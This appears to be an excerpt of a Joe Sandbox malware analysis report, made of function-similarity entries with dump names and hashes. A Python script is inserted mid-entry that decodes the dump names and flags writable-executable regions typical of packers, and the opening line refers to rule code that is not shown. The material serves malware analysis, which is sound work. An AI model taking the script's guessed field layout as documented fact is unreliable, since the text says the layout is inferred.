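Paste further records from the report into REPORT_TEXT to run the same rules over the whole function listing; the anchor printed for each hit is the call-site ref, which is what the "ref:" column in IDA/the report lets you jump to.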
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: ec6f8168e1f533b4adb3c0f0ceaa2da89517b37cd0d1816aefa426c29c6efc33
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: 357213B3908B509BD714CF14C88066AB7E2EFD5314F699A1FF8A56B391D370DC429B82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 97c74925a97b1a22a78e065e4b9105e25c9606f06de8572270d5ac1f61764a6f
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 69A247B2D042688AEF28CF58C8903FEB7B1FF45304F1852AAD5567B291D7399E85CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: d6436f7c77a19c3c13c4e93a6d3baed75ae389c60076e9bdcb0bb4717c21d5cc
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 2BE1D0726083419FCB25DF28C8807EFB7E2EF89304F55592DE5D9AB292D7319845CB82
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 34b35212251f4a43bed05a2b2115a25dba06fb1320400f88ab1474ddec90a119
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: 53E1C4B1A083059FDB24CE18C8817EFB7E2EFC5314F15992DE999A7292D730EC458B46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 870185671d775bcf6b559a37ff027d9911eb2e34728f0f7a4305763e2b905ded
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: D5E14971D042658EEB148F18C984BBEBBE2AB85318F19916DD4A47B392C3378D47CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: _T+q
                                  • API String ID: 0-2297297479
                                  • Opcode ID: 6c0bd443223a173a10f0196db15a469a958aaeef262acd7fac4a0767d374f93d
                                  • Instruction ID: 6cd6bd8fec70cf9a6171b4c559b274589321681f0e24d5f3e2e226f365fdfa87
                                  • Opcode Fuzzy Hash: 6c0bd443223a173a10f0196db15a469a958aaeef262acd7fac4a0767d374f93d
                                  • Instruction Fuzzy Hash: 816136B3A086009FE3046E29DC4573AF7E5EFC4720F2A8A3DEAC497784E63948458753
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: AG/
                                  • API String ID: 0-1128071024
                                  • Opcode ID: 82bac4b95dcbaaa68e034a8b6389004dd95c4c1f8000215fd1790ce37d35cfa5
                                  • Instruction ID: 0a18f86fcf61c96ab47c865693e596e160302f68c155d8e4fe507865753bf108
                                  • Opcode Fuzzy Hash: 82bac4b95dcbaaa68e034a8b6389004dd95c4c1f8000215fd1790ce37d35cfa5
                                  • Instruction Fuzzy Hash: 9C61E0B350D3189FE3147F29EC8577AFBE9EB94350F16492DEAC483740EA3558048A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction ID: 6bd13d35d813755d2bcb6a6e504c3b224017c7644816b6fb3297feda40d6d8ac
                                  • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction Fuzzy Hash: 7E82F0B5900F448FD765CF29C880B92B7E1BF4A300F549A2ED9EE9B752DB30A545CB50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction ID: 6b872688e4b0d3131401a438396e7c733871b0b74d3ccdae6d544f62edad31ba
                                  • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction Fuzzy Hash: 8E429C706047418FC725CF19C090766BBE2BF9E318F289A6EC48A9F792D635F885CB50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction ID: 5af6f39d09b21ec6f632aa386584d5358782b87cba927c429e68039e135a5c32
                                  • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction Fuzzy Hash: 2402E871E002168FCB11CF69C8906AFB7E2EF9A354F16932BE855B7351D770AD828790
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                  • Instruction ID: 57decee995dfd1e927d3726b70a246594f1e9b3dd6266f1bac8f9e3c9a1af2a9
                                  • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                  • Instruction Fuzzy Hash: F8020170A087058FDB15CF29D8803AAB7E1EFE5314F14D72DEA99A7362D731E8858B41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                  • Instruction ID: bac09b3911230eaa6759eb321deb5d6520a19accae38a1893dfc6d2d5291800c
                                  • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                  • Instruction Fuzzy Hash: D8F16BA210C6D14BC71D9A1484B09BD7FD29FAA201F0E86ADFDD71F393DA24DA01DB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                  • Instruction ID: d9ae30cb510e5c415159e7b214f4ad6d8354ade82d166a227e7a5ebf82622f72
                                  • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                  • Instruction Fuzzy Hash: BDD17873F106294BEB08CE99DC913ADB6E2E7D8350F19423ED916F7385D6B49D018790
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
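The dump file names listed under "Memory Dump Source" carry the page protection of each region in a fixed field, which is the quickest way to see where writable and executable memory (the place unpacked or self-modifying code lands) sits inside this module. The following is an added example, not Joe Sandbox code or part of the original report: it decodes the sixteen names that appear on this page. The field layout (process, dump stage, dump id, base address, page protection, then three undecoded fields) is inferred from the names themselves, not from Joe Sandbox documentation, and only the base address and protection fields are interpreted; the protection values are matched against the standard Win32 PAGE_* constants from winnt.h.

```python
"""Decode Joe Sandbox memory-dump file names and flag writable+executable regions.

Assumed (not documented) field layout of a name such as
00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp:
<process>.<dump stage>.<dump id>.<base address>.<page protection>.<f6>.<f7>.<f8>.sdmp
Only base address and page protection are decoded; the rest is kept raw.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Win32 page protection constants (winnt.h). The low byte selects the
# access type; higher bits (guard, nocache, writecombine) are modifiers.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}  # copy-on-write pages are still writable

_DUMP_NAME = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<rest>[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process: int
    stage: int
    dump_id: int
    base: int
    protect: int
    rest: str  # the three trailing fields, left undecoded (assumption: not needed here)

    @property
    def protection_name(self) -> str:
        access = self.protect & 0xFF
        names = [PAGE_PROTECTIONS.get(access, f"0x{access:02X}")]
        names += [n for bit, n in MODIFIERS.items() if self.protect & bit]
        return " | ".join(names)

    @property
    def writable_and_executable(self) -> bool:
        access = self.protect & 0xFF
        return access in EXECUTABLE and access in WRITABLE


def parse_dump_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raises ValueError if it does not fit the layout."""
    m = _DUMP_NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(
        name=name.strip(),
        process=int(m["process"], 16),
        stage=int(m["stage"], 16),
        dump_id=int(m["dump_id"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        rest=m["rest"],
    )


def parse_dump_names(names):
    """Parse many names and return them ordered by base address."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


def wx_regions(regions):
    """Regions whose pages are both writable and executable."""
    return [r for r in regions if r.writable_and_executable]


def protection_summary(regions):
    """How many regions carry each protection (a quick triage view)."""
    return Counter(r.protection_name for r in regions)


# The sixteen dump names from this report's "Memory Dump Source" entries
# (the source file plus its fifteen associated dumps).
REPORT_DUMPS = [
    "00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    regions = parse_dump_names(REPORT_DUMPS)
    for r in regions:
        flag = "  <-- writable+executable" if r.writable_and_executable else ""
        print(f"{r.base:#010x}  {r.protection_name}{flag}")
    print(dict(protection_summary(regions)))
```

Run against the names on this page, the only region that is not executable is the one at the image base (0x00E60000, PAGE_READWRITE, which holds the headers); every other dumped region from 0x00E61000 up to 0x01593000 is PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY. That is the memory layout a packer leaves behind, and those RWX regions are where to point a disassembler when the dumped .sdmp files are loaded.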
                                  • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                  • Instruction ID: 50d462890aea756560e7cf5a297312b8489092193bb5689502cf229b1a3d71b7
                                  • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                  • Instruction Fuzzy Hash: 92D1D472E002198BDF24CF98D8847EDB7B2FF49314F28922AE955BB391D73459478B50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction ID: c618cff1e4bb924e8bc606fcd4957d8ed636c4cdf725ba24c546813c93c0578e
                                  • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction Fuzzy Hash: 71026974E006598FCF26CFA8C4905EEBBB6FF89310F548159E8997B355C730AA91CB90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                  • Instruction ID: a562687fbab2ba0b621c1a1430daa2fa64b048369805391185394bdedec4e230
                                  • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                  • Instruction Fuzzy Hash: 4302F175E006198FCB15CF98C8809EEB7B6FF88350F258169E849BB355D731AA91CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
